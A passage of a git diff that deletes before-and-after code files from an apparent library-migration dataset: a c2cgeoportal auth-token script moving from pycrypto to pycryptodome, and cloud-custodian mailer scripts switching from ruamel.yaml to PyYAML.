-# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
-# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
-# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
-# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-# The views and conclusions contained in the software and documentation are those
-# of the authors and should not be interpreted as representing official policies,
-# either expressed or implied, of the FreeBSD Project.
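For readers tracing the pycrypto-to-pycryptodome migration recorded in the urllogin.py hunk above: pycryptodome requires an explicit cipher mode, and EAX authenticates the ciphertext, so the token format grows from bare ciphertext to nonce + tag + ciphertext. A minimal round-trip sketch of that token layout follows; the helper names are illustrative (not part of the dataset), and it assumes pycryptodome is installed and the key is 16, 24, or 32 ASCII characters long.

    import binascii
    import json

    from Crypto.Cipher import AES  # pycryptodome

    def encode_token(aeskey: str, auth: dict) -> str:
        # assumption: aeskey is a 16/24/32-character ASCII string
        # EAX draws a fresh random 16-byte nonce for every encryption
        cipher = AES.new(aeskey.encode("ascii"), AES.MODE_EAX)
        ciphertext, tag = cipher.encrypt_and_digest(json.dumps(auth).encode("utf-8"))
        # same wire layout as create_token: 16-byte nonce, 16-byte tag, then ciphertext
        return binascii.hexlify(cipher.nonce + tag + ciphertext).decode("ascii")

    def decode_token(aeskey: str, token: str) -> dict:
        data = binascii.unhexlify(token.encode("ascii"))
        nonce, tag, ciphertext = data[0:16], data[16:32], data[32:]
        cipher = AES.new(aeskey.encode("ascii"), AES.MODE_EAX, nonce=nonce)
        # decrypt_and_verify raises ValueError when the tag check fails
        return json.loads(cipher.decrypt_and_verify(ciphertext, tag).decode("utf-8"))

The decode side mirrors the verification that get_user_from_request performs on the "auth" query parameter in the geoportal __init__.py listed earlier.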
- -import argparse -import time -import json -import binascii -import c2c.template -from Crypto.Cipher import AES - - -def create_token(aeskey, user, password, valid): - auth = { - "u": user, - "p": password, - "t": int(time.time()) + valid * 3600 * 24, - } - - if aeskey is None: - print("urllogin is not configured") - exit(1) - cipher = AES.new(aeskey) - data = json.dumps(auth) - mod_len = len(data) % 16 - if mod_len != 0: - data += "".join([" " for i in range(16 - mod_len)]) - return binascii.hexlify(cipher.encrypt(data.encode("utf-8"))).decode("utf-8") - - -def main(): - parser = argparse.ArgumentParser(description="Generate an auth token") - parser.add_argument("user", help="The username") - parser.add_argument("password", help="The password") - parser.add_argument("valid", type=int, default=1, nargs='?', help="Is valid for, in days") - - args = parser.parse_args() - config = c2c.template.get_config("config.yaml") - urllogin = config.get('urllogin', {}) - aeskey = urllogin.get("aes_key") - auth_enc = create_token(aeskey, args.user, args.password, args.valid) - - print(("Use: auth={}".format(auth_enc))) - - -if __name__ == "__main__": - main() diff --git a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.target.py b/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.target.py deleted file mode 100644 index 3a7dbef..0000000 --- a/v1/data/codefile/camptocamp@c2cgeoportal__14388c3__geoportal$c2cgeoportal_geoportal$scripts$urllogin.py.target.py +++ /dev/null @@ -1,73 +0,0 @@ -# -*- coding: utf-8 -*- - -# Copyright (c) 2017-2018, Camptocamp SA -# All rights reserved. - -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: - -# 1. Redistributions of source code must retain the above copyright notice, this -# list of conditions and the following disclaimer. -# 2. Redistributions in binary form must reproduce the above copyright notice, -# this list of conditions and the following disclaimer in the documentation -# and/or other materials provided with the distribution. - -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR -# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -# The views and conclusions contained in the software and documentation are those -# of the authors and should not be interpreted as representing official policies, -# either expressed or implied, of the FreeBSD Project. 
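A detail worth noting in the migrated target file that follows: create_token keeps the manual padding to a 16-byte boundary even though EAX runs AES in a CTR construction and needs no block alignment. The scheme still round-trips because json.loads tolerates trailing whitespace, which the decrypting side in c2cgeoportal_geoportal/__init__.py relies on. A quick self-contained check, with illustrative values only:

    import json

    payload = json.dumps({"u": "alice", "p": "secret", "t": 1700000000})
    padded = payload + " " * (-len(payload) % 16)  # same padding rule as create_token
    assert len(padded) % 16 == 0
    assert json.loads(padded) == json.loads(payload)  # trailing spaces are ignored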
- -import argparse -import time -import json -import binascii -import c2c.template -from Crypto.Cipher import AES - - -def create_token(aeskey, user, password, valid): - auth = { - "u": user, - "p": password, - "t": int(time.time()) + valid * 3600 * 24, - } - - if aeskey is None: - print("urllogin is not configured") - exit(1) - cipher = AES.new(aeskey.encode("ascii"), AES.MODE_EAX) - data = json.dumps(auth) - mod_len = len(data) % 16 - if mod_len != 0: - data += "".join([" " for i in range(16 - mod_len)]) - ciphertext, tag = cipher.encrypt_and_digest(data.encode("utf-8")) - return binascii.hexlify(cipher.nonce + tag + ciphertext).decode("ascii") - - -def main(): - parser = argparse.ArgumentParser(description="Generate an auth token") - parser.add_argument("user", help="The username") - parser.add_argument("password", help="The password") - parser.add_argument("valid", type=int, default=1, nargs='?', help="Is valid for, in days") - - args = parser.parse_args() - config = c2c.template.get_config("config.yaml") - urllogin = config.get('urllogin', {}) - aeskey = urllogin.get("aes_key") - auth_enc = create_token(aeskey, args.user, args.password, args.valid) - - print(("Use: auth={}".format(auth_enc))) - - -if __name__ == "__main__": - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.diff deleted file mode 100644 index 0921114..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.diff +++ /dev/null @@ -1,18 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/cli.py b/tools/c7n_mailer/c7n_mailer/cli.py - index 9f02c55e03a4ad372fdc9632b64491d93787dc94..12e3e8084ddb2e7f5ccbc5ea3c3bd3e4c7e9c207 100644 - --- a/tools/c7n_mailer/c7n_mailer/cli.py - +++ b/tools/c7n_mailer/c7n_mailer/cli.py -@@ -7,12 +7,12 @@ from os import path - - import boto3 - import jsonschema -+import yaml - from c7n_mailer import deploy, utils - from c7n_mailer.azure_mailer.azure_queue_processor import MailerAzureQueueProcessor - from c7n_mailer.azure_mailer import deploy as azure_deploy - from c7n_mailer.sqs_queue_processor import MailerSqsQueueProcessor - from c7n_mailer.utils import get_provider, Providers --from ruamel import yaml - - AZURE_KV_SECRET_SCHEMA = { - 'type': 'object', diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.source.py deleted file mode 100644 index 2613a18..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.source.py +++ /dev/null @@ -1,257 +0,0 @@ -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import functools -import logging -from os import path - -import boto3 -import jsonschema -from c7n_mailer import deploy, utils -from c7n_mailer.azure_mailer.azure_queue_processor import MailerAzureQueueProcessor -from c7n_mailer.azure_mailer import deploy as azure_deploy -from c7n_mailer.sqs_queue_processor import MailerSqsQueueProcessor -from c7n_mailer.utils import get_provider, Providers -from ruamel import yaml - -AZURE_KV_SECRET_SCHEMA = { - 'type': 'object', - 'properties': { - 'type': {'enum': ['azure.keyvault']}, - 'secret': {'type': 'string'} - }, - 'required': ['type', 'secret'], - 'additionalProperties': False -} - 
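The c7n_mailer cli.py hunk above is close to a one-line migration from ruamel.yaml to PyYAML: only the import changes, because the call site yaml.load(fh.read(), Loader=yaml.SafeLoader) belongs to the API surface the two libraries share. A minimal sketch of the shared call pattern; the config path is hypothetical:

    import yaml  # PyYAML; "from ruamel import yaml" exposed a compatible entry point

    with open("mailer.yml") as fh:  # hypothetical path
        config = yaml.load(fh.read(), Loader=yaml.SafeLoader)

    # PyYAML also offers the shorter spelling:
    with open("mailer.yml") as fh:
        config = yaml.safe_load(fh)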
-SECURED_STRING_SCHEMA = { - 'oneOf': [ - {'type': 'string'}, - AZURE_KV_SECRET_SCHEMA - ] -} - -CONFIG_SCHEMA = { - '$schema': 'http://json-schema.org/draft-07/schema', - 'id': 'https://schema.cloudcustodian.io/v0/mailer.json', - 'type': 'object', - 'additionalProperties': False, - 'required': ['queue_url'], - 'properties': { - 'queue_url': {'type': 'string'}, - 'from_address': {'type': 'string'}, - 'contact_tags': {'type': 'array', 'items': {'type': 'string'}}, - 'org_domain': {'type': 'string'}, - - # Standard Lambda Function Config - 'region': {'type': 'string'}, - 'role': {'type': 'string'}, - 'runtime': {'type': 'string'}, - 'memory': {'type': 'integer'}, - 'timeout': {'type': 'integer'}, - 'subnets': {'type': 'array', 'items': {'type': 'string'}}, - 'security_groups': {'type': 'array', 'items': {'type': 'string'}}, - 'dead_letter_config': {'type': 'object'}, - 'lambda_name': {'type': 'string'}, - 'lambda_description': {'type': 'string'}, - 'lambda_tags': {'type': 'object'}, - 'lambda_schedule': {'type': 'string'}, - - # Azure Function Config - 'function_properties': { - 'type': 'object', - 'appInsights': { - 'type': 'object', - 'oneOf': [ - {'type': 'string'}, - {'type': 'object', - 'properties': { - 'name': 'string', - 'location': 'string', - 'resourceGroupName': 'string'} - } - ] - }, - 'storageAccount': { - 'type': 'object', - 'oneOf': [ - {'type': 'string'}, - {'type': 'object', - 'properties': { - 'name': 'string', - 'location': 'string', - 'resourceGroupName': 'string'} - } - ] - }, - 'servicePlan': { - 'type': 'object', - 'oneOf': [ - {'type': 'string'}, - {'type': 'object', - 'properties': { - 'name': 'string', - 'location': 'string', - 'resourceGroupName': 'string', - 'skuTier': 'string', - 'skuName': 'string'} - } - ] - }, - }, - 'function_schedule': {'type': 'string'}, - 'function_skuCode': {'type': 'string'}, - 'function_sku': {'type': 'string'}, - - # Mailer Infrastructure Config - 'cache_engine': {'type': 'string'}, - 'smtp_server': {'type': 'string'}, - 'smtp_port': {'type': 'integer'}, - 'smtp_ssl': {'type': 'boolean'}, - 'smtp_username': {'type': 'string'}, - 'smtp_password': SECURED_STRING_SCHEMA, - 'ldap_email_key': {'type': 'string'}, - 'ldap_uid_tags': {'type': 'array', 'items': {'type': 'string'}}, - 'debug': {'type': 'boolean'}, - 'ldap_uid_regex': {'type': 'string'}, - 'ldap_uri': {'type': 'string'}, - 'ldap_bind_dn': {'type': 'string'}, - 'ldap_bind_user': {'type': 'string'}, - 'ldap_uid_attribute': {'type': 'string'}, - 'ldap_manager_attribute': {'type': 'string'}, - 'ldap_email_attribute': {'type': 'string'}, - 'ldap_bind_password_in_kms': {'type': 'boolean'}, - 'ldap_bind_password': {'type': 'string'}, - 'cross_accounts': {'type': 'object'}, - 'ses_region': {'type': 'string'}, - 'redis_host': {'type': 'string'}, - 'redis_port': {'type': 'integer'}, - 'datadog_api_key': {'type': 'string'}, # TODO: encrypt with KMS? - 'datadog_application_key': {'type': 'string'}, # TODO: encrypt with KMS? 
- 'slack_token': {'type': 'string'}, - 'slack_webhook': {'type': 'string'}, - 'sendgrid_api_key': SECURED_STRING_SCHEMA, - 'splunk_hec_url': {'type': 'string'}, - 'splunk_hec_token': {'type': 'string'}, - 'splunk_remove_paths': { - 'type': 'array', - 'items': {'type': 'string'} - }, - 'splunk_actions_list': {'type': 'boolean'}, - 'splunk_max_attempts': {'type': 'integer'}, - 'splunk_hec_max_length': {'type': 'integer'}, - - # SDK Config - 'profile': {'type': 'string'}, - 'http_proxy': {'type': 'string'}, - 'https_proxy': {'type': 'string'}, - - # Mapping account / emails - 'account_emails': {'type': 'object'} - } -} - - -def session_factory(mailer_config): - return boto3.Session( - region_name=mailer_config['region'], - profile_name=mailer_config.get('profile', None)) - - -def get_logger(debug=False): - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.INFO, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - if debug: - logging.getLogger('botocore').setLevel(logging.DEBUG) - debug_logger = logging.getLogger('custodian-mailer') - debug_logger.setLevel(logging.DEBUG) - return debug_logger - else: - return logging.getLogger('custodian-mailer') - - -def get_and_validate_mailer_config(args): - with open(args.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - jsonschema.validate(config, CONFIG_SCHEMA) - utils.setup_defaults(config) - return config - - -def get_c7n_mailer_parser(): - parser = argparse.ArgumentParser() - parser.add_argument('-c', '--config', required=True, help='mailer.yml config file') - debug_help_msg = 'sets c7n_mailer logger to debug, for maximum output (the default is INFO)' - parser.add_argument('--debug', action='store_true', help=debug_help_msg) - max_num_processes_help_msg = 'will run the mailer in parallel, integer of max processes allowed' - parser.add_argument('--max-num-processes', type=int, help=max_num_processes_help_msg) - templates_folder_help_msg = 'message templates folder location' - parser.add_argument('-t', '--templates', help=templates_folder_help_msg) - group = parser.add_mutually_exclusive_group(required=True) - update_lambda_help_msg = 'packages your c7n_mailer, uploads the zip to aws lambda as a function' - group.add_argument('--update-lambda', action='store_true', help=update_lambda_help_msg) - run_help_msg = 'run c7n-mailer locally, process sqs messages and send emails or sns messages' - group.add_argument('--run', action='store_true', help=run_help_msg) - return parser - - -def run_mailer_in_parallel(processor, max_num_processes): - max_num_processes = int(max_num_processes) - if max_num_processes < 1: - raise Exception - processor.max_num_processes = max_num_processes - processor.run(parallel=True) - - -def main(): - parser = get_c7n_mailer_parser() - args = parser.parse_args() - mailer_config = get_and_validate_mailer_config(args) - args_dict = vars(args) - logger = get_logger(debug=args_dict.get('debug', False)) - - module_dir = path.dirname(path.abspath(__file__)) - default_templates = [path.abspath(path.join(module_dir, 'msg-templates')), - path.abspath(path.join(module_dir, '..', 'msg-templates')), - path.abspath('.')] - templates = args_dict.get('templates', None) - if templates: - default_templates.append(path.abspath(path.expanduser(path.expandvars(templates)))) - - mailer_config['templates_folders'] = default_templates - - provider = get_provider(mailer_config) - if args_dict.get('update_lambda'): - if args_dict.get('debug'): - print('\n** 
--debug is only supported with --run, not --update-lambda **\n') - return - if args_dict.get('max_num_processes'): - print('\n** --max-num-processes is only supported ' - 'with --run, not --update-lambda **\n') - return - - if provider == Providers.Azure: - azure_deploy.provision(mailer_config) - elif provider == Providers.AWS: - deploy.provision(mailer_config, functools.partial(session_factory, mailer_config)) - - if args_dict.get('run'): - max_num_processes = args_dict.get('max_num_processes') - - # Select correct processor - if provider == Providers.Azure: - processor = MailerAzureQueueProcessor(mailer_config, logger) - elif provider == Providers.AWS: - aws_session = session_factory(mailer_config) - processor = MailerSqsQueueProcessor(mailer_config, aws_session, logger) - - # Execute - if max_num_processes: - run_mailer_in_parallel(processor, max_num_processes) - else: - processor.run() - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.target.py deleted file mode 100644 index 0377b6f..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$cli.py.target.py +++ /dev/null @@ -1,257 +0,0 @@ -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import functools -import logging -from os import path - -import boto3 -import jsonschema -import yaml -from c7n_mailer import deploy, utils -from c7n_mailer.azure_mailer.azure_queue_processor import MailerAzureQueueProcessor -from c7n_mailer.azure_mailer import deploy as azure_deploy -from c7n_mailer.sqs_queue_processor import MailerSqsQueueProcessor -from c7n_mailer.utils import get_provider, Providers - -AZURE_KV_SECRET_SCHEMA = { - 'type': 'object', - 'properties': { - 'type': {'enum': ['azure.keyvault']}, - 'secret': {'type': 'string'} - }, - 'required': ['type', 'secret'], - 'additionalProperties': False -} - -SECURED_STRING_SCHEMA = { - 'oneOf': [ - {'type': 'string'}, - AZURE_KV_SECRET_SCHEMA - ] -} - -CONFIG_SCHEMA = { - '$schema': 'http://json-schema.org/draft-07/schema', - 'id': 'https://schema.cloudcustodian.io/v0/mailer.json', - 'type': 'object', - 'additionalProperties': False, - 'required': ['queue_url'], - 'properties': { - 'queue_url': {'type': 'string'}, - 'from_address': {'type': 'string'}, - 'contact_tags': {'type': 'array', 'items': {'type': 'string'}}, - 'org_domain': {'type': 'string'}, - - # Standard Lambda Function Config - 'region': {'type': 'string'}, - 'role': {'type': 'string'}, - 'runtime': {'type': 'string'}, - 'memory': {'type': 'integer'}, - 'timeout': {'type': 'integer'}, - 'subnets': {'type': 'array', 'items': {'type': 'string'}}, - 'security_groups': {'type': 'array', 'items': {'type': 'string'}}, - 'dead_letter_config': {'type': 'object'}, - 'lambda_name': {'type': 'string'}, - 'lambda_description': {'type': 'string'}, - 'lambda_tags': {'type': 'object'}, - 'lambda_schedule': {'type': 'string'}, - - # Azure Function Config - 'function_properties': { - 'type': 'object', - 'appInsights': { - 'type': 'object', - 'oneOf': [ - {'type': 'string'}, - {'type': 'object', - 'properties': { - 'name': 'string', - 'location': 'string', - 'resourceGroupName': 'string'} - } - ] - }, - 'storageAccount': { - 'type': 'object', - 'oneOf': [ - {'type': 'string'}, - {'type': 'object', - 'properties': { - 'name': 'string', - 'location': 
'string', - 'resourceGroupName': 'string'} - } - ] - }, - 'servicePlan': { - 'type': 'object', - 'oneOf': [ - {'type': 'string'}, - {'type': 'object', - 'properties': { - 'name': 'string', - 'location': 'string', - 'resourceGroupName': 'string', - 'skuTier': 'string', - 'skuName': 'string'} - } - ] - }, - }, - 'function_schedule': {'type': 'string'}, - 'function_skuCode': {'type': 'string'}, - 'function_sku': {'type': 'string'}, - - # Mailer Infrastructure Config - 'cache_engine': {'type': 'string'}, - 'smtp_server': {'type': 'string'}, - 'smtp_port': {'type': 'integer'}, - 'smtp_ssl': {'type': 'boolean'}, - 'smtp_username': {'type': 'string'}, - 'smtp_password': SECURED_STRING_SCHEMA, - 'ldap_email_key': {'type': 'string'}, - 'ldap_uid_tags': {'type': 'array', 'items': {'type': 'string'}}, - 'debug': {'type': 'boolean'}, - 'ldap_uid_regex': {'type': 'string'}, - 'ldap_uri': {'type': 'string'}, - 'ldap_bind_dn': {'type': 'string'}, - 'ldap_bind_user': {'type': 'string'}, - 'ldap_uid_attribute': {'type': 'string'}, - 'ldap_manager_attribute': {'type': 'string'}, - 'ldap_email_attribute': {'type': 'string'}, - 'ldap_bind_password_in_kms': {'type': 'boolean'}, - 'ldap_bind_password': {'type': 'string'}, - 'cross_accounts': {'type': 'object'}, - 'ses_region': {'type': 'string'}, - 'redis_host': {'type': 'string'}, - 'redis_port': {'type': 'integer'}, - 'datadog_api_key': {'type': 'string'}, # TODO: encrypt with KMS? - 'datadog_application_key': {'type': 'string'}, # TODO: encrypt with KMS? - 'slack_token': {'type': 'string'}, - 'slack_webhook': {'type': 'string'}, - 'sendgrid_api_key': SECURED_STRING_SCHEMA, - 'splunk_hec_url': {'type': 'string'}, - 'splunk_hec_token': {'type': 'string'}, - 'splunk_remove_paths': { - 'type': 'array', - 'items': {'type': 'string'} - }, - 'splunk_actions_list': {'type': 'boolean'}, - 'splunk_max_attempts': {'type': 'integer'}, - 'splunk_hec_max_length': {'type': 'integer'}, - - # SDK Config - 'profile': {'type': 'string'}, - 'http_proxy': {'type': 'string'}, - 'https_proxy': {'type': 'string'}, - - # Mapping account / emails - 'account_emails': {'type': 'object'} - } -} - - -def session_factory(mailer_config): - return boto3.Session( - region_name=mailer_config['region'], - profile_name=mailer_config.get('profile', None)) - - -def get_logger(debug=False): - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.INFO, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - if debug: - logging.getLogger('botocore').setLevel(logging.DEBUG) - debug_logger = logging.getLogger('custodian-mailer') - debug_logger.setLevel(logging.DEBUG) - return debug_logger - else: - return logging.getLogger('custodian-mailer') - - -def get_and_validate_mailer_config(args): - with open(args.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - jsonschema.validate(config, CONFIG_SCHEMA) - utils.setup_defaults(config) - return config - - -def get_c7n_mailer_parser(): - parser = argparse.ArgumentParser() - parser.add_argument('-c', '--config', required=True, help='mailer.yml config file') - debug_help_msg = 'sets c7n_mailer logger to debug, for maximum output (the default is INFO)' - parser.add_argument('--debug', action='store_true', help=debug_help_msg) - max_num_processes_help_msg = 'will run the mailer in parallel, integer of max processes allowed' - parser.add_argument('--max-num-processes', type=int, help=max_num_processes_help_msg) - templates_folder_help_msg = 'message templates folder 
location' - parser.add_argument('-t', '--templates', help=templates_folder_help_msg) - group = parser.add_mutually_exclusive_group(required=True) - update_lambda_help_msg = 'packages your c7n_mailer, uploads the zip to aws lambda as a function' - group.add_argument('--update-lambda', action='store_true', help=update_lambda_help_msg) - run_help_msg = 'run c7n-mailer locally, process sqs messages and send emails or sns messages' - group.add_argument('--run', action='store_true', help=run_help_msg) - return parser - - -def run_mailer_in_parallel(processor, max_num_processes): - max_num_processes = int(max_num_processes) - if max_num_processes < 1: - raise Exception - processor.max_num_processes = max_num_processes - processor.run(parallel=True) - - -def main(): - parser = get_c7n_mailer_parser() - args = parser.parse_args() - mailer_config = get_and_validate_mailer_config(args) - args_dict = vars(args) - logger = get_logger(debug=args_dict.get('debug', False)) - - module_dir = path.dirname(path.abspath(__file__)) - default_templates = [path.abspath(path.join(module_dir, 'msg-templates')), - path.abspath(path.join(module_dir, '..', 'msg-templates')), - path.abspath('.')] - templates = args_dict.get('templates', None) - if templates: - default_templates.append(path.abspath(path.expanduser(path.expandvars(templates)))) - - mailer_config['templates_folders'] = default_templates - - provider = get_provider(mailer_config) - if args_dict.get('update_lambda'): - if args_dict.get('debug'): - print('\n** --debug is only supported with --run, not --update-lambda **\n') - return - if args_dict.get('max_num_processes'): - print('\n** --max-num-processes is only supported ' - 'with --run, not --update-lambda **\n') - return - - if provider == Providers.Azure: - azure_deploy.provision(mailer_config) - elif provider == Providers.AWS: - deploy.provision(mailer_config, functools.partial(session_factory, mailer_config)) - - if args_dict.get('run'): - max_num_processes = args_dict.get('max_num_processes') - - # Select correct processor - if provider == Providers.Azure: - processor = MailerAzureQueueProcessor(mailer_config, logger) - elif provider == Providers.AWS: - aws_session = session_factory(mailer_config) - processor = MailerSqsQueueProcessor(mailer_config, aws_session, logger) - - # Execute - if max_num_processes: - run_mailer_in_parallel(processor, max_num_processes) - else: - processor.run() - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.diff deleted file mode 100644 index 155b87f..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.diff +++ /dev/null @@ -1,20 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/replay.py b/tools/c7n_mailer/c7n_mailer/replay.py - index 9f02c55e03a4ad372fdc9632b64491d93787dc94..12e3e8084ddb2e7f5ccbc5ea3c3bd3e4c7e9c207 100644 - --- a/tools/c7n_mailer/c7n_mailer/replay.py - +++ b/tools/c7n_mailer/c7n_mailer/replay.py -@@ -15,6 +15,7 @@ import json - import logging - import os - import zlib -+import yaml - - import boto3 - import jsonschema -@@ -22,7 +23,6 @@ from c7n_mailer.cli import CONFIG_SCHEMA - from c7n_mailer.email_delivery import EmailDelivery - from c7n_mailer.utils import setup_defaults - from c7n_mailer.utils_email import get_mimetext_message --from ruamel import yaml - - logger = 
logging.getLogger(__name__) - diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.source.py deleted file mode 100644 index 4c3f6a1..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.source.py +++ /dev/null @@ -1,144 +0,0 @@ -""" -Allow local testing of mailer and templates by replaying an SQS message. - -MAILER_FILE input is a file containing the exact base64-encoded, gzipped -data that's enqueued to SQS via :py:meth:`c7n.actions.Notify.send_sqs`. - -Alternatively, with -p|--plain specified, the file will be assumed to be -JSON data that can be loaded directly. -""" -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import base64 -import json -import logging -import os -import zlib - -import boto3 -import jsonschema -from c7n_mailer.cli import CONFIG_SCHEMA -from c7n_mailer.email_delivery import EmailDelivery -from c7n_mailer.utils import setup_defaults -from c7n_mailer.utils_email import get_mimetext_message -from ruamel import yaml - -logger = logging.getLogger(__name__) - - -class MailerTester(object): - - def __init__(self, msg_file, config, msg_plain=False, json_dump_file=None): - if not os.path.exists(msg_file): - raise RuntimeError("File does not exist: %s" % msg_file) - logger.debug('Reading message from: %s', msg_file) - with open(msg_file, 'r') as fh: - raw = fh.read() - logger.debug('Read %d byte message', len(raw)) - if msg_plain: - raw = raw.strip() - else: - logger.debug('base64-decoding and zlib decompressing message') - raw = zlib.decompress(base64.b64decode(raw)) - if json_dump_file is not None: - with open(json_dump_file, 'wb') as fh: # pragma: no cover - fh.write(raw) - self.data = json.loads(raw) - logger.debug('Loaded message JSON') - self.config = config - self.session = boto3.Session() - - def run(self, dry_run=False, print_only=False): - emd = EmailDelivery(self.config, self.session, logger) - addrs_to_msgs = emd.get_to_addrs_email_messages_map(self.data) - logger.info('Would send email to: %s', addrs_to_msgs.keys()) - if print_only: - mime = get_mimetext_message( - self.config, - logger, - self.data, - self.data['resources'], - ['foo@example.com'] - ) - logger.info('Send mail with subject: "%s"', mime['Subject']) - print(mime.get_payload(None, True).decode('utf-8')) - return - if dry_run: - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - print('-> SEND MESSAGE TO: %s' % '; '.join(to_addrs)) - print(mimetext_msg.get_payload(None, True).decode('utf-8')) - return - # else actually send the message... 
- for to_addrs, mimetext_msg in addrs_to_msgs.items(): - logger.info('Actually sending mail to: %s', to_addrs) - emd.send_c7n_email(self.data, list(to_addrs), mimetext_msg) - - -def setup_parser(): - parser = argparse.ArgumentParser('Test c7n-mailer templates and mail') - parser.add_argument('-c', '--config', required=True) - parser.add_argument('-d', '--dry-run', dest='dry_run', action='store_true', - default=False, - help='Log messages that would be sent, but do not send') - parser.add_argument('-T', '--template-print', dest='print_only', - action='store_true', default=False, - help='Just print rendered templates') - parser.add_argument('-t', '--templates', default=None, type=str, - help='message templates folder location') - parser.add_argument('-p', '--plain', dest='plain', action='store_true', - default=False, - help='Expect MESSAGE_FILE to be a plain string, ' - 'rather than the base64-encoded, gzipped SQS ' - 'message format') - parser.add_argument('-j', '--json-dump-file', dest='json_dump_file', - type=str, action='store', default=None, - help='If dump JSON of MESSAGE_FILE to this path; ' - 'useful to base64-decode and gunzip a message') - parser.add_argument('MESSAGE_FILE', type=str, - help='Path to SQS message dump/content file') - return parser - - -def session_factory(config): - return boto3.Session( - region_name=config['region'], - profile_name=config.get('profile')) - - -def main(): - parser = setup_parser() - options = parser.parse_args() - - module_dir = os.path.dirname(os.path.abspath(__file__)) - default_templates = [ - os.path.abspath(os.path.join(module_dir, 'msg-templates')), - os.path.abspath(os.path.join(module_dir, '..', 'msg-templates')), - os.path.abspath('.') - ] - templates = options.templates - if templates: - default_templates.append( - os.path.abspath(os.path.expanduser(os.path.expandvars(templates))) - ) - - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.DEBUG, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - - with open(options.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - - jsonschema.validate(config, CONFIG_SCHEMA) - setup_defaults(config) - config['templates_folders'] = default_templates - - tester = MailerTester( - options.MESSAGE_FILE, config, msg_plain=options.plain, - json_dump_file=options.json_dump_file - ) - tester.run(options.dry_run, options.print_only) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__12e3e80__tools$c7n_mailer$c7n_mailer$replay.py.target.py 